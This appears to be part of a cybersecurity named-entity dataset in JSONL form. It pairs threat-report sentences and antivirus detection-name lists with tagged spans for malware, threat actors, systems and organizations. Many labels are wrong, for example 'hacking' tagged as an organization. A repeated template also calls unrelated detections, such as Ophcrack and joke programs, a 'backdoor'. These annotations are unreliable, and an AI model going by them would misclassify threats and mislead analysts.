{"text": "A backdoor also known as: PSWTool.Win32.Ophcrack!O Tool.Ophcrack.Win32.15 W32/MalwareF.MTNL not-a-virus:PSWTool.Win32.Ophcrack.a Application.PassView.BE Tool.PassSteel.1076 BehavesLike.Win32.Dropper.rc W32/Risk.YHKN-9333 RiskWare[PSWTool]/Win32.PWDump.at Application.PassView.BE not-a-virus:PSWTool.Win32.Ophcrack.a Application.PassView.BE Trojan.PSWTool!8KQf3yAIaxc not-a-virus.PSWTool.ophCrack", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003812", "source": "cyner2_train"}}
{"text": "The ransom note contains the following text:", "spans": {}, "info": {"id": "cyner2_train_003815", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Corrupt.PE Worm:Win32/Fanta@mm.dam#2 Worm.Win32.Fanta", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003816", "source": "cyner2_train"}}
{"text": "Dridex is a banking trojan, which is a bot that communicates with a C&C server through HTTP.", "spans": {"MALWARE: Dridex": [[0, 6]], "MALWARE: banking trojan,": [[12, 27]], "MALWARE: bot": [[39, 42]]}, "info": {"id": "cyner2_train_003817", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Virut.G W32/Trojan2.MPL W32.Virut.CF W32/Virut.GE Virus.Win32.Virut.ce Win32.Virut.AM Trojan.Opclose TR/VB.EWS Worm.Win32.SillyFDC!IK Worm/Kolab.jfi Virus:Win32/Virut.BN Win32/Virut.F W32/Trojan2.MPL Virus.Virut.13 Win32.Virut.dz Worm.Win32.SillyFDC W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003820", "source": "cyner2_train"}}
{"text": "After further investigation, we realized that its infrastructure for exfiltrating credentials was still operational and that Ebury was still being actively used by the Windigo gang.", "spans": {"SYSTEM: infrastructure": [[50, 64]], "MALWARE: Ebury": [[125, 130]], "THREAT_ACTOR: the Windigo gang.": [[164, 181]]}, "info": {"id": "cyner2_train_003821", "source": "cyner2_train"}}
{"text": "The attackers compromised two legitimate Thai websites to host the malware, which is a tactic this group has used in the past.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: malware,": [[67, 75]], "THREAT_ACTOR: group": [[99, 104]]}, "info": {"id": "cyner2_train_003822", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.SMSHoax Dropper.Dapato.Win32.20900 Win32.Trojan.WisdomEyes.16070401.9500.9953 TROJ_GE.CFDA1E9F Win.Trojan.Inject-14546 Trojan.Win32.InstallMonster.cxzobk Win.Troj.mzIo TrojWare.Win32.Injector.BCBA Trojan.InstallMonster.120 TROJ_GE.CFDA1E9F BehavesLike.Win32.Backdoor.rc Hoax.Win32.ArchSMS Trojan/Inject.awic TR/Rogue.11221316.14 Win32.Troj.Undef.kcloud Trojan.Injector!UXjGJT5Czj8 W32/Injector.BCBB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003823", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Small.AIA4 Trojan.Buzy.518 TROJ_DLOADR.SMUS Win32/Small.QR TROJ_DLOADR.SMUS Trojan.DownLoader6.35083 BehavesLike.Win32.RansomWannaCry.mz Trojan.Win32.Malex TrojanDownloader:Win32/Onitab.B Trojan/Win32.Downloader.R33065 Trj/CI.A Win32/TrojanDownloader.Small.PAL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003824", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Scar.499712.C Trojan-Ransom.Win32.Blocker!O TrojanDropper.Dwonk.A Trojan/Chydo.cdh TROJ_RENOS.SM Win32.Worm.AutoRun.bj W32/Trojan2.JXKJ Win32/SillyAutorun.CCQ TROJ_RENOS.SM Trojan-Ransom.Win32.Blocker.ckeq Trojan.Win32.Drop.ihult Trojan.Win32.Chydo.1032192 TrojWare.Win32.Scar.AB Trojan.MulDrop.46689 Backdoor.Klon.Win32.955 BehavesLike.Win32.Backdoor.gc Trojan.Win32.Chydo W32/Trojan.GFJX-4360 Trojan/Scar.cym Trojan/Win32.Scar Trojan-Ransom.Win32.Blocker.ckeq TrojanDropper:Win32/Dwonk.A Trojan/Win32.Chydo.R3468 Trojan.Chudik.28205 Trojan-ransom.Win32.Blocker.ckeq Trojan.Chydo!nNe8FVSDJ+I Win32/Trojan.16c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003825", "source": "cyner2_train"}}
{"text": "The second phase is when an attachment from the malspam retrieves ransomware from a web server.", "spans": {"MALWARE: ransomware": [[66, 76]], "SYSTEM: a web server.": [[82, 95]]}, "info": {"id": "cyner2_train_003827", "source": "cyner2_train"}}
{"text": "These malicious installers were then uploaded to Baidu's cloud file sharing service for used by Chinese iOS/OS X developers.", "spans": {"MALWARE: malicious installers": [[6, 26]], "SYSTEM: Baidu's cloud file sharing service": [[49, 83]], "ORGANIZATION: Chinese iOS/OS X developers.": [[96, 124]]}, "info": {"id": "cyner2_train_003828", "source": "cyner2_train"}}
{"text": "The technical details of the attack have yet to be made public, however we've recently identified tools uploaded to online malware repositories that we believe are linked to the heist.", "spans": {"MALWARE: tools": [[98, 103]], "MALWARE: online malware repositories": [[116, 143]], "THREAT_ACTOR: the heist.": [[174, 184]]}, "info": {"id": "cyner2_train_003833", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Visel.41946 Backdoor.Visel.Win32.404 Backdoor.W32.Visel.asz!c Backdoor/Visel.asd Win32.Trojan.WisdomEyes.16070401.9500.9969 Backdoor.Trojan Trojan-GameThief.Win32.Magania.tqse Trojan.Win32.Visel.bqjxis BackDoor.Darkshell.270 BehavesLike.Win32.Downloader.ph Backdoor.Win32.Visel Backdoor/Visel.sw TR/Drop.Strigy.A.2 Trojan[Backdoor]/Win32.Visel TrojanDropper:Win32/Strigy.A Backdoor.Win32.A.Visel.39424 Trojan-GameThief.Win32.Magania.tqse Backdoor/Win32.CSon.R885 Win32.Trojan-gamethief.Magania.Pfju Trojan.DR.Strigy!SJEu21JfMbU W32/Visel.ASZ!tr.bdr Trj/ByShell.C Win32/Trojan.b7f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003834", "source": "cyner2_train"}}
{"text": "In 2016, from September through November, an APT campaign known as menuPass targeted Japanese academics working in several areas of science, along with Japanese pharmaceutical and a US-based subsidiary of a Japanese manufacturing organizations.", "spans": {"THREAT_ACTOR: an APT campaign": [[42, 57]], "THREAT_ACTOR: menuPass": [[67, 75]], "ORGANIZATION: Japanese academics": [[85, 103]], "ORGANIZATION: Japanese pharmaceutical": [[152, 175]], "ORGANIZATION: US-based subsidiary of a Japanese manufacturing organizations.": [[182, 244]]}, "info": {"id": "cyner2_train_003836", "source": "cyner2_train"}}
{"text": "Attacks originating from this threat group have not ceased since our previous report from April of 2017 and have continued through July of 2017.", "spans": {"ORGANIZATION: threat group": [[30, 42]]}, "info": {"id": "cyner2_train_003837", "source": "cyner2_train"}}
{"text": "It searches the Android and Google Chrome browsers for stored sensitive information.", "spans": {"SYSTEM: Android": [[16, 23]], "SYSTEM: Google Chrome browsers": [[28, 50]]}, "info": {"id": "cyner2_train_003838", "source": "cyner2_train"}}
{"text": "The malicious capabilities observed in the second stage include the following : Upload attacker-specified files to C2 servers Get list of installed applications Get device metadata Inspect itself to get a list of launchable activities Retrieves PDF , txt , doc , xls , xlsx , ppt , pptx files found on external storage Send SMS Retrieve text messages Track device location Handle limited attacker commands via out of band text messages Record surrounding audio Record calls Record video Retrieve account information such as email addresses Retrieve contacts Removes copies of itself if any additional APKs are downloaded to external storage .", "spans": {}, "info": {"id": "cyner2_train_003840", "source": "cyner2_train"}}
{"text": "The functionality of Pro PoS seems fairly extensive according to recent press releases.", "spans": {"MALWARE: Pro PoS": [[21, 28]]}, "info": {"id": "cyner2_train_003848", "source": "cyner2_train"}}
{"text": "The summer months dawn on us and the financial year comes to a close.", "spans": {}, "info": {"id": "cyner2_train_003850", "source": "cyner2_train"}}
{"text": "Today, we are releasing the full whitepaper on the Potao malware with additional findings, the cyberespionage campaigns where it was employed, and its connection to a backdoor in the form of a modified version of the TrueCrypt encryption software.", "spans": {"MALWARE: Potao malware": [[51, 64]], "THREAT_ACTOR: cyberespionage campaigns": [[95, 119]], "MALWARE: backdoor": [[167, 175]], "MALWARE: the TrueCrypt encryption software.": [[213, 247]]}, "info": {"id": "cyner2_train_003851", "source": "cyner2_train"}}
{"text": "Dropped by the Nuclear exploit kit, further investigation showed that the malware was a new Trojan called Thanatos by its developers and that we refer to internally as Alphabot", "spans": {"MALWARE: Nuclear exploit kit,": [[15, 35]], "MALWARE: malware": [[74, 81]], "MALWARE: Trojan": [[92, 98]], "MALWARE: Thanatos": [[106, 114]], "THREAT_ACTOR: developers": [[122, 132]], "THREAT_ACTOR: Alphabot": [[168, 176]]}, "info": {"id": "cyner2_train_003852", "source": "cyner2_train"}}
{"text": "A newly patched zero-day vulnerability in Internet Explorer has already been exploited in attacks involving a compromised website belonging to an evangelical church in Hong Kong.", "spans": {"VULNERABILITY: zero-day vulnerability": [[16, 38]], "SYSTEM: Internet Explorer": [[42, 59]], "ORGANIZATION: evangelical church": [[146, 164]]}, "info": {"id": "cyner2_train_003854", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod748.Trojan.b154 Trojan.DR.Cutwail!zuYZ2Zvwu1k Trojan.Zlob PE:Trojan.Win32.DNSChanger.drb!1075148351 TrojWare.Win32.Trojan.DNSChanger.~CRSD Trojan.Packed.194 Win32.Troj.DNSChangerT.dx.14848 Trojan:Win32/Zlob.AS Trojan/Win32.Monder Virus.Win32.Heur.c Trojan.Inject Downloader.Tiny.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003855", "source": "cyner2_train"}}
{"text": "Indeed, the past few months seem to be quite busy for the Andromeda botnet and its recent activity indicates intent in the United States.", "spans": {"MALWARE: Andromeda botnet": [[58, 74]]}, "info": {"id": "cyner2_train_003857", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Symmi.D13DDA Win.Trojan.Delf-6394424-2 Trojan-Downloader.Win32.Delf.krvg Trojan.Win32.Delf.evdbqw BehavesLike.Win32.BadFile.th Trojan-Downloader.Win32.Delf TR/Downloader.sfpmb Trojan-Downloader.Win32.Delf.krvg Trojan/Win32.Tiggre.C2290717 Trj/GdSda.A W32/Delf.CGH!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003858", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.BindEx.A3 Trojan.MSIL.BindEx.a Win32.Risk.Malware.Szbo Trojan.InstallCube.49 Trojan.Zusy.D3BCBB Trojan.MSIL.BindEx.a Trojan:MSIL/Torwofun.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003860", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Qhost.pml Win32/Jeefo.A Virus.Win32.Hidrag.a Win32.Jeefo.B Virus.Win32.Hidrag.clfcen Win32.Jeefo.B Win32.HLLP.Jeefo.36352 Trojan:Win32/Vb.At W32/Hidrag.E Virus/Win32.Hidrag.a Win32.Jeefo.B Virus.Win32.Hidrag.a Win32.Jeefo.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003861", "source": "cyner2_train"}}
{"text": "The identification of cyber crime actors, particularly Nigerian 419 scam operators, attempting to exploit CVE-2014-4114 demonstrates how quickly cyber criminals are trying to exploit a vulnerability previously associated with espionage actors, using similar tactics, techniques, and procedures TTP to maximize their chances of success, with additional innovation as seen with these samples.", "spans": {"THREAT_ACTOR: cyber crime actors,": [[22, 41]], "THREAT_ACTOR: Nigerian 419 scam operators,": [[55, 83]], "VULNERABILITY: exploit": [[98, 105], [175, 182]], "THREAT_ACTOR: cyber criminals": [[145, 160]], "VULNERABILITY: vulnerability": [[185, 198]], "THREAT_ACTOR: espionage actors,": [[226, 243]]}, "info": {"id": "cyner2_train_003863", "source": "cyner2_train"}}
{"text": "This assessment is supported by both previous X-Force research and open source reporting on ITG08, although X-Force lacks definitive data that verifies this was the initial access vector.", "spans": {"ORGANIZATION: research": [[54, 62]], "ORGANIZATION: open source reporting": [[67, 88]], "THREAT_ACTOR: ITG08,": [[92, 98]], "ORGANIZATION: X-Force": [[108, 115]], "THREAT_ACTOR: access vector.": [[173, 187]]}, "info": {"id": "cyner2_train_003864", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Winlogonxe.Trojan Trojan-PSW.Win32.Papras!O Trojan.Fsysna Win32.Trojan.WisdomEyes.16070401.9500.9984 Trojan.Win32.Fsysna.dikb Trojan.Win32.Papras.bsmtj Trojan.Win32.A.PSW-Papras.39982 Troj.PSW32.W.QQPass.l2mO Trojan.DownLoader.origin Trojan.OnLineGames.Win32.77881 BehavesLike.Win32.SpywareLyndra.nh Backdoor.Win32.DarkMoon Trojan/PSW.Papras.ut Trojan[PSW]/Win32.Papras Win32.PSWTroj.Papras.kcloud Trojan.Win32.Fsysna.dikb Backdoor:Win32/Votwup.B Trojan/Win32.Papras.R7955 Win32.Trojan.Fsysna.Edxa Win32/Trojan.b7e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003865", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.D26B7F Win32.Trojan.WisdomEyes.16070401.9500.9941 W32/Trojan.ITVV-3454 Trojan.MulDrop4.59905 BehavesLike.Win32.Trojan.fh Trojan:Win32/Yangxiay.A Win32/Trojan.6f6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003866", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Skeeyah.5634 Trojan.Zusy.D38734 TROJ_FASTREK.SM Win32.Trojan.WisdomEyes.16070401.9500.9982 TROJ_FASTREK.SM Trojan.Win32.Dwn.dqtjmk Trojan.DownLoader12.58274 W32/Trojan.UUJD-8445 Worm:Win32/Pemtaka.A Win32/Trojan.562", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003868", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod9fb.Trojan.3b9b Joke.MoveDesktop W32/MoveDesktop.A TROJ_SPNR.04CJ11 Joke.Slidescreen.4 JOKE/MoveDesktop.A TROJ_SPNR.04CJ11 Win32.Troj.Hoax.kcloud Joke:Win32/Crazyscr.A Joke.Win32.Metro Trj/CI.A Win32/Joke.SlideScreen Joke.Win32.ShakeScreen.b Virus.Win32.BHO Joke.BR Trojan.Win32.BadJoke.Ar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003871", "source": "cyner2_train"}}
{"text": "On October 26, 2015, Cyphort Labs discovered that psychcentral[.]com has been compromised and is currently infecting visitors via drive-by-download malwares.", "spans": {"ORGANIZATION: Cyphort Labs": [[21, 33]], "MALWARE: drive-by-download malwares.": [[130, 157]]}, "info": {"id": "cyner2_train_003872", "source": "cyner2_train"}}
{"text": "A previously unknown group called Strider has been conducting cyberespionage-style attacks against selected targets in Russia, China, Sweden, and Belgium.", "spans": {"THREAT_ACTOR: unknown group": [[13, 26]], "THREAT_ACTOR: Strider": [[34, 41]]}, "info": {"id": "cyner2_train_003876", "source": "cyner2_train"}}
{"text": "Terracotta's network of 1500+ VPN nodes throughout the world are primarily obtained by hacking into inadequately protected Windows servers in legitimate organizations, without the victim's knowledge or permission.", "spans": {"THREAT_ACTOR: Terracotta's network": [[0, 20]], "SYSTEM: VPN nodes": [[30, 39]], "ORGANIZATION: hacking": [[87, 94]], "SYSTEM: Windows servers": [[123, 138]]}, "info": {"id": "cyner2_train_003878", "source": "cyner2_train"}}
{"text": "Multiple owners of Github repositories received phishing emails.", "spans": {"ORGANIZATION: owners": [[9, 15]], "SYSTEM: Github repositories": [[19, 38]]}, "info": {"id": "cyner2_train_003882", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Kryptik.UMVM-2214 TrojWare.MSIL.Kryptik.ACD Trojan.KillProc.49202 BehavesLike.Win32.Trojan.fh W32/Kryptik.PD Trojan.Zusy.D33DFF Trojan/Win32.Dynamer.C2272217 Trojan.ScreenLocker Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003886", "source": "cyner2_train"}}
{"text": "A few days ago I got a message on Facebook from a person I very rarely speak to, and I knew that something fishy was going on.", "spans": {"ORGANIZATION: Facebook": [[34, 42]]}, "info": {"id": "cyner2_train_003888", "source": "cyner2_train"}}
{"text": "We found two vulnerabilities that were now being targeted by exploit kits, with one being the recent Pawn Storm Flash zero-day.", "spans": {"VULNERABILITY: two vulnerabilities": [[9, 28]], "MALWARE: exploit kits,": [[61, 74]], "THREAT_ACTOR: Pawn Storm": [[101, 111]], "VULNERABILITY: Flash zero-day.": [[112, 127]]}, "info": {"id": "cyner2_train_003889", "source": "cyner2_train"}}
{"text": "Continuing with the never ending series of malware email attachments is an email with the subject of payment slip coming or pretending to come from random companies, names and email addresses with an ACE attachment ACE files are a sort of zip file that normally needs special software to extract.", "spans": {"MALWARE: malware": [[43, 50]]}, "info": {"id": "cyner2_train_003893", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97m.Downloader.GBT W97M.Downloader.BHA W97M.Downloader W2KM_POWLOAD.AUSJQU W97m.Downloader.GBT W97m.Downloader.GBT Trojan.Ole2.Vbs-heuristic.druvzi W97m.Downloader.GBT W97m.Downloader.GBT W2KM_POWLOAD.AUSJQU HEUR.VBA.Trojan.e virus.office.qexvmc.1095", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003894", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.E388 Trojan.Zusy.D3675 Backdoor.Trojan Win32/Talwadig.A Spammer:Win32/Talwadig.A W32/Talwadig.SPM!tr Win32/Trojan.49c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003895", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Spy.Burda.vq W32/Trojan2.LHHI Trojan-Spy.Win32.Burda.bun TrojWare.Win32.Spy.Burda.A Trojan.Packed.1027 TROJ_BURDA.SM Win32/SinoMBR.A W32/Trojan2.LHHI Virus.Win32.SinoMBR!IK Trojan:Win32/Riggin.B Trojan-Spy.Win32.Burda.r Virus.Win32.SinoMBR Downloader.Small.61.BV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003896", "source": "cyner2_train"}}
{"text": "The recent vulnerability of MS15-093 revealed that attackers were using it distribute the Korplug/Plugx RAT.", "spans": {"VULNERABILITY: vulnerability": [[11, 24]], "VULNERABILITY: MS15-093": [[28, 36]], "MALWARE: RAT.": [[104, 108]]}, "info": {"id": "cyner2_train_003897", "source": "cyner2_train"}}
{"text": "The brazen attack used chained 0-days against Adobe Flash and Microsoft Internet Explorer 9 to attempt to gain access to internal networks at these companies.", "spans": {"VULNERABILITY: brazen attack": [[4, 17]], "VULNERABILITY: chained 0-days": [[23, 37]], "SYSTEM: Adobe Flash": [[46, 57]], "SYSTEM: Microsoft Internet Explorer 9": [[62, 91]]}, "info": {"id": "cyner2_train_003901", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.MSIL.1 Win32.Trojan.WisdomEyes.16070401.9500.9592 Ransom_HEROPOINT.A Trojan.Win32.Ransom.ewrnqz Trojan.Win32.S.Ransom.29184.B Ransom_HEROPOINT.A Trojan-Ransom.Heropoint Trojan.MSIL.ieap TR/Ransom.gohtu Ransom:MSIL/Crypute.C Trojan.Ransom.Filecoder Trj/GdSda.A Win32/Trojan.Ransom.935", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003903", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Kryptik.myh Win32.Trojan.WisdomEyes.16070401.9500.9688 Trojan.Win32.Click1.cpofr Trojan.Click1.34698 TR/Taranis.3998 Win32.TrojDownloader.Unknown.kcloud TrojanDownloader:Win32/Mimho.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003906", "source": "cyner2_train"}}
{"text": "The worst affected were companies in the smelting, electric power generation and transmission, construction, and engineering industries.", "spans": {"ORGANIZATION: companies": [[24, 33]], "ORGANIZATION: the smelting, electric power generation": [[37, 76]], "ORGANIZATION: transmission, construction,": [[81, 108]], "ORGANIZATION: engineering industries.": [[113, 136]]}, "info": {"id": "cyner2_train_003908", "source": "cyner2_train"}}
{"text": "Spread via hacked Aeria games offered on unofficial websites, the modular malware can download and install virtually any other malicious code on the victim's computer.", "spans": {"SYSTEM: Aeria games": [[18, 29]], "MALWARE: malware": [[74, 81]], "MALWARE: malicious code": [[127, 141]], "SYSTEM: the victim's computer.": [[145, 167]]}, "info": {"id": "cyner2_train_003910", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Emotet.MUE.A5 Backdoor.PePatch.Win32.40158 Trojan/Urelas.u Win32.Trojan.Urelas.a Backdoor.Graybird TROJ_URELAS.SMC Win.Trojan.Urelas-212 Trojan.Win32.demmsd.eaqemx Ransom.Win32.CryLock.a Trojan.AVKill.33464 TROJ_URELAS.SMC BehavesLike.Win32.Gupboot.hc Trojan.Win32.Toga Backdoor/Plite.ah Trojan.Zusy.D1C63F Trojan/Win32.Urelas.R92523 BScope.Backdoor.Gulf Trojan.Urelas.U Trojan.Urelas!2wQyqHhm58c W32/Urelas.AB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003912", "source": "cyner2_train"}}
{"text": "The analysis starts with a Microsoft Word document named 2017 Q4 Work Plan.docx with a hash of 292843976600e8ad2130224d70356bfc, which was created on 2017-10-11 by a user called Admin'', and first uploaded to VirusTotal, a website and file scanning service, on the same day, by a user in South Africa.", "spans": {"ORGANIZATION: VirusTotal,": [[209, 220]], "ORGANIZATION: user": [[280, 284]]}, "info": {"id": "cyner2_train_003913", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Estiwir.S21079 Trojan.Win32.Estiwir Trojan:Win32/Estiwir.A Trj/CI.A Win32/Trojan.87b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003914", "source": "cyner2_train"}}
{"text": "We also learned that an Android malware known as GhostCtrl was stored in their infrastructure, which might be used for cyberespionage or cybercrime.", "spans": {"MALWARE: an Android malware": [[21, 39]], "MALWARE: GhostCtrl": [[49, 58]], "SYSTEM: infrastructure,": [[79, 94]], "THREAT_ACTOR: cyberespionage": [[119, 133]], "THREAT_ACTOR: cybercrime.": [[137, 148]]}, "info": {"id": "cyner2_train_003915", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameExQSJKAH.Trojan Backdoor.Pahador.Win32.1 Backdoor/Pahador.t BKDR_PAHADOR.AB Win32.Trojan.WisdomEyes.16070401.9500.9967 W32/Backdoor.QCR Win32/Spybot.AEZ BKDR_PAHADOR.AB Win.Trojan.Delf-939 Trojan.Win32.Fsysna.dhnu Trojan.Win32.Pahador.dkwu Backdoor.Win32.Pahador.801128 Troj.W32.Fsysna!c Backdoor.Win32.Pahador.T Program.Vskeylogger Backdoor.Win32.Pahador W32/Backdoor.PLOG-4776 Backdoor/Pahador.ai Trojan[Backdoor]/Win32.Pahador Win32.Hack.Pahador.t.kcloud Backdoor.Pahador Trojan.Win32.Fsysna.dhnu Trojan/Win32.Pahador.R2394 TScope.Trojan.Delf Win32/Pahador.T Win32.Trojan.Fsysna.Dyzz Backdoor.Pahador!aVEw4P0RDQo W32/Sfmybd.C3E3!tr Win32/Trojan.05c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003916", "source": "cyner2_train"}}
{"text": "However, getting 83 pieces in one shot is way too generous by any account and it surely peaked the interest of our researchers.", "spans": {}, "info": {"id": "cyner2_train_003918", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Adware.TOVus.Win32.1 HT_TOVKATER_GC31024C.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9998 HT_TOVKATER_GC31024C.UVPM AdWare.TOVus Trojan.Win32.Tovkater.emvdzi Trojan.InstallMonster.2420 Pua.Downloadmanager TrojanDownloader:Win32/Katerav.A!bit Trojan.Zusy.D37F51 PUP.Optional.BundleInstaller Win32/TrojanDownloader.Tovkater.D Trojan-Downloader.Win32.Tovkater W32/Tovkater.F!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003920", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Bindo.worm W32/Malas.LPWD-1696 W32.Linkfars Win.Worm.AutoRun-1 P2P-Worm.Win32.Malas.r Heur.Corrupt.PE P2P-Worm:W32/Malas.A W32/Bindo.worm W32/Malas.A WORM/Khanani.A Worm:Win32/Malas.A P2P-Worm.Win32.Malas.r W32/Nahkos.D.worm P2P-Worm.Win32.Malas W32/Malas.R!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003924", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL Trojan.MSILPerseus.DE1E5 Trojan.MSIL.Fakesupport W32/Trojan.VUDL-1796 Trojan.MSIL.idlr W32.Bsodscam.Locker SupportScam:MSIL/TechscamBSOD.A PUP/Win32.FakeBSOD.R192454 Trojan.TechSupportScam", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003928", "source": "cyner2_train"}}
{"text": "The operation seems to originate from Saudi Arabia mostly; seeing its C2 IP is a home IP address and njRat does not support proxying C2 communciations over infectees.", "spans": {"THREAT_ACTOR: operation": [[4, 13]], "MALWARE: njRat": [[101, 106]]}, "info": {"id": "cyner2_train_003930", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9802 Trojan.Win32.VkHost.aeys Trojan.Win32.Delf.wgpjk Troj.W32.Vkhost!c Win32.Trojan.Vkhost.Wtxk Trojan.PWS.Spy.14811 BehavesLike.Win32.BadFile.fh W32/Trojan.HSNN-1750 Trojanspy:Win32/Fitmu.A BDS/Delf.aegx W32/VkHost.AEYS!tr Trojan[Backdoor]/Win32.Delf Trojan.Graftor.D754C Trojan.Win32.Z.Graftor.401229 Trojan.Win32.VkHost.aeys Trojan:Win32/Kuta.A Trojan/Win32.Delf.C161449 Backdoor.Delf Win32/Bicololo.D Backdoor.Win32.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003931", "source": "cyner2_train"}}
{"text": "We first learned of Locky through Invincea and expanded on qualifying this threat with the help of PhishMe. Locky has also gained enough traction to find its way onto Dynamoo's Blog and Reddit.", "spans": {"MALWARE: Locky": [[20, 25], [108, 113]], "MALWARE: threat": [[75, 81]], "ORGANIZATION: PhishMe.": [[99, 107]], "ORGANIZATION: Dynamoo's Blog": [[167, 181]], "ORGANIZATION: Reddit.": [[186, 193]]}, "info": {"id": "cyner2_train_003932", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9638 Trojan.Dropper Win32/SillyDl.XVX Win.Trojan.Msupdater-1 Trojan-Ransom.Win32.Blocker.cfzl Trojan.Win32.Inject.cmocx Trojan.MulDrop3.62588 Trojan.Blocker.Win32.31495 BehavesLike.Win32.Backdoor.cc Trojan[Ransom]/Win32.Blocker Trojan-Ransom.Win32.Blocker.cfzl Trojan:Win32/Ovoxual.B Trojan.Che.xc Win32.Trojan.Blocker.Stua Trojan.Blocker!XrooD1Mdx9Q Win32/Trojan.Dropper.cd7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003933", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Corrupt.PE HackTool[DoS]/Win32.Fedup DoS:Win32/Fedup.2_0.dam Hoax.Win32.BadJoke.FakeDel", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003934", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Vbs.Trojan.Qhost.Lpbo Trojan/Bicololo.a Win32.Trojan.WisdomEyes.16070401.9500.9869 Trojan.VBS.Qhost.gc Trojan.Script.Qhost.dbtszl TrojWare.Win32.Bicololo.DI Trojan.Hosts.6838 W32.Trojan.Bat.Qhost Trojan:BAT/Qhost.AF Trojan.SMHeist.1 Trojan.VBS.Qhost.gc Trojan/Win32.Bicololo.R82150 Win32/Bicololo.A Trojan.BAT.Qhost W32/Bicololo.A!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003936", "source": "cyner2_train"}}
